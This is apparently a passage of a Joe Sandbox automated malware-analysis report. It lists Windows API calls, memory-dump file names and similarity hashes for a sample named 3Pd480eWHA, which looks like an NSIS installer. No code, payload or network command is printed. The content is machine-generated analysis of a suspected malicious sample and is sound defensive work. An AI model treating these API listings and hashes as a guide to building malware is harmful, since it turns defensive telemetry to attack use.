                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$@y
                                                                                              • API String ID: 3540041739-3020698753
                                                                                              • Opcode ID: 23981b414acec4a909d74728ae7c31128a1c52990f28844aeca2583cf0c79733
                                                                                              • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                                              • Opcode Fuzzy Hash: 23981b414acec4a909d74728ae7c31128a1c52990f28844aeca2583cf0c79733
                                                                                              • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                                              APIs
                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,007A8000,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FCF
                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                                              • CharNextA.USER32(?,007A8000,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FE1
                                                                                              • CharPrevA.USER32(?,?,771B3410,007A9400,00000000,004030C7,007A9400,007A9400,004032DC), ref: 00405FF1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                              • Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
                                                                                              • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                              • Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                              • API String ID: 0-2069967915
                                                                                              • Opcode ID: 62494035d2b322331e699be7b0b53c5f1b8d0de2799238c75fdfd6477764094b
                                                                                              • Instruction ID: dfb571a1b213ce51894fa074ea64b3fd95d138b5633724999a4f142903221e1f
                                                                                              • Opcode Fuzzy Hash: 62494035d2b322331e699be7b0b53c5f1b8d0de2799238c75fdfd6477764094b
                                                                                              • Instruction Fuzzy Hash: 8DF15D74B00208DFDB19DB68C954B5EBBB3BF88340F648568E505AB355CB75EC82CB82
                                                                                              APIs
                                                                                              • lstrcatA.KERNEL32(00000000,00000000,004093E8,007A8800,00000000,00000000,00000031), ref: 00401790
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,004093E8,004093E8,00000000,00000000,004093E8,007A8800,00000000,00000000,00000031), ref: 004017BA
                                                                                                • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,007A1740,NSIS Error), ref: 00405D19
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(0079DD20), ref: 00404F5E
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(?,0079DD20), ref: 00404F6E
                                                                                                • Part of subcall function 00404F25: lstrcatA.KERNEL32(0079DD20,?,?,0079DD20), ref: 00404F81
                                                                                                • Part of subcall function 00404F25: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00404F93
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID:
                                                                                              • API String ID: 1941528284-0
                                                                                              • Opcode ID: 491a21a9f6a60a86725e37869eef28b2dba974702bf83004d190f1b0ca19f42f
                                                                                              • Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
                                                                                              • Opcode Fuzzy Hash: 491a21a9f6a60a86725e37869eef28b2dba974702bf83004d190f1b0ca19f42f
                                                                                              • Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                                              • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                                              • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                                              • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                                              APIs
                                                                                              • CharNextA.USER32(?,00000000,?,?,004015C2,00000000,000000F0), ref: 00405825
                                                                                              • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 0040582A
                                                                                              • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 0040583E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID: :$\
                                                                                              • API String ID: 3213498283-1166558509
                                                                                              • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                              • Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
                                                                                              • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                              • Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: a2ffcf30888faf62a2fffa15a6d80cc535626273481d4b0d0e46a36277f7fb6e
                                                                                              • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                                              • Opcode Fuzzy Hash: a2ffcf30888faf62a2fffa15a6d80cc535626273481d4b0d0e46a36277f7fb6e
                                                                                              • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D3B
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                              • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3808545654-0
                                                                                              • Opcode ID: 7759b1c2666ea4b2aaeaf3915ac05adf06ad776dfafda30cc4f04744dc2a8b2d
                                                                                              • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                                              • Opcode Fuzzy Hash: 7759b1c2666ea4b2aaeaf3915ac05adf06ad776dfafda30cc4f04744dc2a8b2d
                                                                                              • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00405E38,00000000,00000002,?,00000002,?,?,00405E38,80000002,Software\Microsoft\Windows\CurrentVersion,?,007A0EE0,?), ref: 00405C1C
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,8^@,?,00405E38), ref: 00405C3D
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00405C5E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: 8^@
                                                                                              • API String ID: 3677997916-2279431280
                                                                                              • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                              • Instruction ID: 82031ed88aedd54e8f4210183bcc3f8d35f395a35efeba70fd312e8ed480c043
                                                                                              • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                              • Instruction Fuzzy Hash: AC014C7254420AEFDF118F64DC44ADB3FACEF18394B044026F91596220D235D964CBA5
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(0079DD20), ref: 00404F5E
                                                                                                • Part of subcall function 00404F25: lstrlenA.KERNEL32(?,0079DD20), ref: 00404F6E
                                                                                                • Part of subcall function 00404F25: lstrcatA.KERNEL32(0079DD20,?,?,0079DD20), ref: 00404F81
                                                                                                • Part of subcall function 00404F25: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00404F93
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                                                • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2987980305-0
                                                                                              • Opcode ID: cb7d2b3ffacc05dc4655b01ad5987bb235332aa8f09704f6372af737942c9465
                                                                                              • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                                              • Opcode Fuzzy Hash: cb7d2b3ffacc05dc4655b01ad5987bb235332aa8f09704f6372af737942c9465
                                                                                              • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                                              APIs
                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                              • lstrlenA.KERNEL32(00409BE8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,00409BE8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00409BE8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: a44e0dd845452c16e0676ba07943d4070dacd9b647c2caf80fcc8f4f65a6adba
                                                                                              • Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
                                                                                              • Opcode Fuzzy Hash: a44e0dd845452c16e0676ba07943d4070dacd9b647c2caf80fcc8f4f65a6adba
                                                                                              • Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,00000000,00402DE2,00000001), ref: 00402C15
                                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                                              • Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
                                                                                              • Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                                              • Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                                                • Part of subcall function 00403F3D: SendMessageA.USER32(?,?,00000000,00000000), ref: 00403F4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                              • Instruction ID: 1c3aa9a2031039442b6cd3bdc360fce63fd7b644e996c38402bdeea248e73ffc
                                                                                              • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                              • Instruction Fuzzy Hash: 2D0171B1104249AFDF219F51DC80A5B3A25E7C4755F104037FB00762D1D33AAD619B6E
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004059C2
                                                                                              • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495567019.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.2495505650.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495621278.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495676639.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.2495933854.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                              • Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
                                                                                              • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                              • Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q
                                                                                              • API String ID: 0-4102054182
                                                                                              • Opcode ID: cee74e6166c22afb1528435cf8d873bfd15a52afa5d38579a12ebf9fa397883b
                                                                                              • Instruction ID: f3ce5788d656a8643a3e1dcdc99052c8cf24be2c2df0db4d855a8fb80371383f
                                                                                              • Opcode Fuzzy Hash: cee74e6166c22afb1528435cf8d873bfd15a52afa5d38579a12ebf9fa397883b
                                                                                              • Instruction Fuzzy Hash: D5B15C34A01208CFEB18DF65C994B9EB7B6FF88344F2485A9E405AB355DB75DC82CB81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DR]5$XM$XM$T]5
                                                                                              • API String ID: 0-1928459452
                                                                                              • Opcode ID: a6b0598e764d14703582eb7d3797bc1dba6e7c2716896c2f37d68de9ba5546ce
                                                                                              • Instruction ID: cead8d780763ea197635fba802dc20bdcc214f6335187b0d1222adac7c3e90a0
                                                                                              • Opcode Fuzzy Hash: a6b0598e764d14703582eb7d3797bc1dba6e7c2716896c2f37d68de9ba5546ce
                                                                                              • Instruction Fuzzy Hash: E3A14974B013198FEB14DF78C850BAEBBB2BF89300F5045A9D509AB355DA319D86CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LRq$LRq$$q$$q
                                                                                              • API String ID: 0-2204215535
                                                                                              • Opcode ID: ccc4471b5ec812b764075836da9f67a8aba993a0c0b96c2cc4284c2dcf802070
                                                                                              • Instruction ID: db95487e53294561d896b906bc83e10d6f1f42b4d692d287ebaacaef3c55d5bb
                                                                                              • Opcode Fuzzy Hash: ccc4471b5ec812b764075836da9f67a8aba993a0c0b96c2cc4284c2dcf802070
                                                                                              • Instruction Fuzzy Hash: 7251BF34B003059FEB18DB69C851B6AB7F6BF88304F1485A9E505AF3A5DA32EC41CB52
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q
                                                                                              • API String ID: 0-4102054182
                                                                                              • Opcode ID: fd6e2a78e1d6fb2e3d6725b6e0dace3060bdd9660c5d6f27b751ac712acc77ba
                                                                                              • Instruction ID: 0c40b2e98a86de4d3774cf68d5aa4fc233a940cea9eccb4f8e63e04f87e3f5da
                                                                                              • Opcode Fuzzy Hash: fd6e2a78e1d6fb2e3d6725b6e0dace3060bdd9660c5d6f27b751ac712acc77ba
                                                                                              • Instruction Fuzzy Hash: 195191B4A00204CFEB15DF64D490A9EB7F6EB88355F608529E405EB355DB32EC42CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (\]5$(\]5$$q$$q
                                                                                              • API String ID: 0-2074910076
                                                                                              • Opcode ID: 4a2049dd199740b28f51e18efa181a8069ebf0a02090c79d3321293c0f39b490
                                                                                              • Instruction ID: 374bcfb0d64eb75afd15a601f3c683f937359dbde809f6a7f9cbb0ba9d36e870
                                                                                              • Opcode Fuzzy Hash: 4a2049dd199740b28f51e18efa181a8069ebf0a02090c79d3321293c0f39b490
                                                                                              • Instruction Fuzzy Hash: 60414C75E80309CFDB14CFA8D98069DB7B2FF84314B50495AE805AB254DF72AD42CB82
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000), ref: 004058F4
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                                              • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000), ref: 0040591D
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000), ref: 00405926
                                                                                              Memory Dump Source
